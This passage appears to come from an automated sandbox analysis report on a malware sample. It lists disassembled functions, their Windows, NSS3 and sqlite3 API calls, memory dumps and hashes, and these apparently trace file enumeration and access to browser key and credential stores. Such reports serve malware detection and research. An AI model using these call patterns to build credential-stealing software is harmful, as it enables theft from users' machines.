                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$18A$P2#v$1#v
                                                                                          • API String ID: 1125553467-171246937
                                                                                          • Opcode ID: 5cc61c22e0d64447a01a93ad15b9fe953fd84475edf738f88382c0ecc67c970f
                                                                                          • Instruction ID: eff374fbcd62c6e18ab1f1aaab25817c9043c0eeef42efb3c17498ac9b2729e3
                                                                                          • Opcode Fuzzy Hash: 5cc61c22e0d64447a01a93ad15b9fe953fd84475edf738f88382c0ecc67c970f
                                                                                          • Instruction Fuzzy Hash: 93A18FB1A00218ABCB34DFA4DC85FEE7379BF48305F448589E50D96181EB789B89CF65
                                                                                          Function 6CBAAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6CBAACC4
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CBAACD5
                                                                                          • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CBAACF3
                                                                                          • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CBAAD3B
                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CBAADC8
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBAADDF
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBAADF0
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBAB06A
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBAB08C
                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBAB1BA
                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBAB27C
                                                                                          • memset.VCRUNTIME140(?,00000000,00002010), ref: 6CBAB2CA
                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CBAB3C1
                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBAB40C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                          • String ID:
                                                                                          • API String ID: 1285963562-0
                                                                                          • Opcode ID: cff6256b2e30ce763fc248a9b5e68f45e8be3245187a15504ffd7e7c89588c7b
                                                                                          • Instruction ID: 29bd1481d2b300dc177772093e93dfa2d7937b3938fbdfeaddf0ee441a523262
                                                                                          • Opcode Fuzzy Hash: cff6256b2e30ce763fc248a9b5e68f45e8be3245187a15504ffd7e7c89588c7b
                                                                                          • Instruction Fuzzy Hash: FB22B171908380AFE710CF55CC40B9A77E5EF44308F24857CE8A95B792E772E85ACB96
                                                                                          Function 6CA8C4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA8C5F9
                                                                                          • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA8C6FB
                                                                                          • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CA8C74D
                                                                                          • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CA8C7DE
                                                                                          • memset.VCRUNTIME140(?,00000000,00004014), ref: 6CA8C9D5
                                                                                          • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA8CC76
                                                                                          • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CA8CD7A
                                                                                          • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA8DB40
                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6CA8DB62
                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6CA8DB99
                                                                                          • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA8DD8B
                                                                                          • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CA8DE95
                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6CA8E360
                                                                                          • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA8E432
                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6CA8E472
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 368790112-0
                                                                                          • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                          • Instruction ID: de0b3f80230422bf4efed64ec00beadcbf6999024770e62b955452aeb654f62a
                                                                                          • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                          • Instruction Fuzzy Hash: 7E339E71E0121ACFCB04CFACC8806ADBBF2FF49314F29426AD955AB755D731A985CB90
                                                                                          Function 6CB2ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • sqlite3_initialize.NSS3 ref: 6CB2ED38
                                                                                            • Part of subcall function 6CAC4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAC4FC4
                                                                                          • sqlite3_mprintf.NSS3(snippet), ref: 6CB2EF3C
                                                                                          • sqlite3_mprintf.NSS3(offsets), ref: 6CB2EFE4
                                                                                            • Part of subcall function 6CBEDFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CAC5001,?,00000003,00000000), ref: 6CBEDFD7
                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6CB2F087
                                                                                          • sqlite3_mprintf.NSS3(matchinfo), ref: 6CB2F129
                                                                                          • sqlite3_mprintf.NSS3(optimize), ref: 6CB2F1D1
                                                                                          • sqlite3_free.NSS3(?), ref: 6CB2F368
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                          • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                          • API String ID: 2518200370-449611708
                                                                                          • Opcode ID: 99fccc2238a1f338c18799bbd72fc24bf28d52ff835463c7ab566e99eb5343b8
                                                                                          • Instruction ID: e22933c20a9945a5f0cd68baa09d6d4919812066170ce49cff7da047244c9b7b
                                                                                          • Opcode Fuzzy Hash: 99fccc2238a1f338c18799bbd72fc24bf28d52ff835463c7ab566e99eb5343b8
                                                                                          • Instruction Fuzzy Hash: 3F02ADB5B042919BE7049F72A88573F37B2BBC5708F14453CE85E87B01EB79E8468792
                                                                                          Function 00414050 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 137stringmemoryfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414060
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00414067
                                                                                          • wsprintfA.USER32 ref: 00414086
                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 0041409D
                                                                                          • StrCmpCA.SHLWAPI(?,00420F94), ref: 004140CB
                                                                                          • StrCmpCA.SHLWAPI(?,00420F98), ref: 004140E1
                                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041416B
                                                                                          • FindClose.KERNEL32(000000FF), ref: 00414180
                                                                                          • lstrcat.KERNEL32(?,0081C728), ref: 004141A5
                                                                                          • lstrcat.KERNEL32(?,0081B7F8), ref: 004141B8
                                                                                          • lstrlenA.KERNEL32(?), ref: 004141C5
                                                                                          • lstrlenA.KERNEL32(?), ref: 004141D6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                          • String ID: %s\%s$%s\*$P2#v$1#v
                                                                                          • API String ID: 13328894-4226942003
                                                                                          • Opcode ID: 01225944c54d07649508d6c48e8f7c5dfaa03e67c8e8b3bd80d1bb06a40eafd3
                                                                                          • Instruction ID: 5a9d9924cf4f5588b7cf1b0220733e19b9eaeea9c8f58638c5d055d4a934acf6
                                                                                          • Opcode Fuzzy Hash: 01225944c54d07649508d6c48e8f7c5dfaa03e67c8e8b3bd80d1bb06a40eafd3
                                                                                          • Instruction Fuzzy Hash: 6A5194B1940218ABC720EB70DC89FEE777DAF58304F40458DB60996190EB749BC5CFA5
                                                                                          Function 0040EB60 Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 369fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 0040EB7E
                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 0040EB95
                                                                                          • StrCmpCA.SHLWAPI(?,004214DC), ref: 0040EBEB
                                                                                          • StrCmpCA.SHLWAPI(?,004214E0), ref: 0040EC01
                                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F0EE
                                                                                          • FindClose.KERNEL32(000000FF), ref: 0040F103
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNextwsprintf
                                                                                          • String ID: %s\*.*$P2#v$1#v
                                                                                          • API String ID: 180737720-3139634048
                                                                                          • Opcode ID: e6b9b230384824213b0ea7d3f0555db51e141fc5402f5cfade634dd89464c9a9
                                                                                          • Instruction ID: c6306bd3c9db837ca22bf811b4dc293e3d61997c094f6f04bf3b71cb7d88404f
                                                                                          • Opcode Fuzzy Hash: e6b9b230384824213b0ea7d3f0555db51e141fc5402f5cfade634dd89464c9a9
                                                                                          • Instruction Fuzzy Hash: 27E13071912118AADB14FB61DC56EEE7338AF50314F4041EEB40B62092EE786FD9CF5A
                                                                                          Function 6CBAEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CBAC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CBADAE2,?), ref: 6CBAC6C2
                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBAF0AE
                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBAF0C8
                                                                                          • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CBAF101
                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBAF11D
                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CC7218C), ref: 6CBAF183
                                                                                          • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CBAF19A
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBAF1CB
                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CBAF1EF
                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CBAF210
                                                                                            • Part of subcall function 6CB552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CBAF1E9,?,00000000,?,?), ref: 6CB552F5
                                                                                            • Part of subcall function 6CB552D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CB5530F
                                                                                            • Part of subcall function 6CB552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CB55326
                                                                                            • Part of subcall function 6CB552D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CBAF1E9,?,00000000,?,?), ref: 6CB55340
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBAF227
                                                                                            • Part of subcall function 6CB9FAB0: free.MOZGLUE(?,-00000001,?,?,6CB3F673,00000000,00000000), ref: 6CB9FAC7
                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CBAF23E
                                                                                            • Part of subcall function 6CB9BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CB4E708,00000000,00000000,00000004,00000000), ref: 6CB9BE6A
                                                                                            • Part of subcall function 6CB9BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CB504DC,?), ref: 6CB9BE7E
                                                                                            • Part of subcall function 6CB9BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CB9BEC2
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CBAF2BB
                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6CBAF3A8
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CBAF3B3
                                                                                            • Part of subcall function 6CB52D20: PK11_DestroyObject.NSS3(?,?), ref: 6CB52D3C
                                                                                            • Part of subcall function 6CB52D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB52D5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                          • String ID:
                                                                                          • API String ID: 1559028977-0
                                                                                          • Opcode ID: c91235ed3963142d3750bb3c43b82ea110f67fb2e4e5b241cef602b455cd1d82
                                                                                          • Instruction ID: aacaac3473387b88bc125a89f6f50a2502520b63793ba7958d995d660a50a444
                                                                                          • Opcode Fuzzy Hash: c91235ed3963142d3750bb3c43b82ea110f67fb2e4e5b241cef602b455cd1d82
                                                                                          • Instruction Fuzzy Hash: EED18EB6E052459FEB10CFEAD880ADEB7F5EF48308F148029E955A7711EB31E806CB51
                                                                                          Function 6CACECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CACED0A
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CACEE68
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CACEF87
                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CACEF98
                                                                                          Strings
                                                                                          • %s at line %d of [%.10s], xrefs: 6CACF492
                                                                                          • database corruption, xrefs: 6CACF48D
                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CACF483
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _byteswap_ulong
                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                          • API String ID: 4101233201-598938438
                                                                                          • Opcode ID: a5060c6a9e3d7d58ad7820e7348feb891bb2b2ad3e5511f9efd9cd0fefbb66d5
                                                                                          • Instruction ID: 8631159a863ddc9e3d7b88144997fb9b80e4ebff3ee6ebd0be3875b39086bbd4
                                                                                          • Opcode Fuzzy Hash: a5060c6a9e3d7d58ad7820e7348feb891bb2b2ad3e5511f9efd9cd0fefbb66d5
                                                                                          • Instruction Fuzzy Hash: 86620074B042458FEB04CF69C880B9ABBB1BF45318F1C419DD8566BB92D735E8C6CB92
                                                                                          Function 0040DC50 Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 370fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C19), ref: 0040DC9E
                                                                                          • StrCmpCA.SHLWAPI(?,0042146C), ref: 0040DCEE
                                                                                          • StrCmpCA.SHLWAPI(?,00421470), ref: 0040DD04
                                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E220
                                                                                          • FindClose.KERNEL32(000000FF), ref: 0040E232
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                          • String ID: P2#v$\*.*$t@$1#v
                                                                                          • API String ID: 2325840235-1068732243
                                                                                          • Opcode ID: 2aba9a4d3cd8a4bb6c12051e66f7745c538f30c2f86c87ebc9ca92114b92ad39
                                                                                          • Instruction ID: e9223715fb7ea1854cb62e564a6307543a1272858c9b536fbbbe29962c1fc9f0
                                                                                          • Opcode Fuzzy Hash: 2aba9a4d3cd8a4bb6c12051e66f7745c538f30c2f86c87ebc9ca92114b92ad39
                                                                                          • Instruction Fuzzy Hash: 3EF1FE71915118AACB15FB61DC95AEEB338AF24314F8041DFB40A62091EF782BD9CF5A
                                                                                          Function 6CB70EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PK11_PubDeriveWithKDF.NSS3 ref: 6CB70F8D
                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CB70FB3
                                                                                          • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CB71006
                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6CB7101C
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB71033
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB7103F
                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6CB71048
                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6CB7108E
                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CB710BB
                                                                                          • memcpy.VCRUNTIME140(?,00000006,?), ref: 6CB710D6
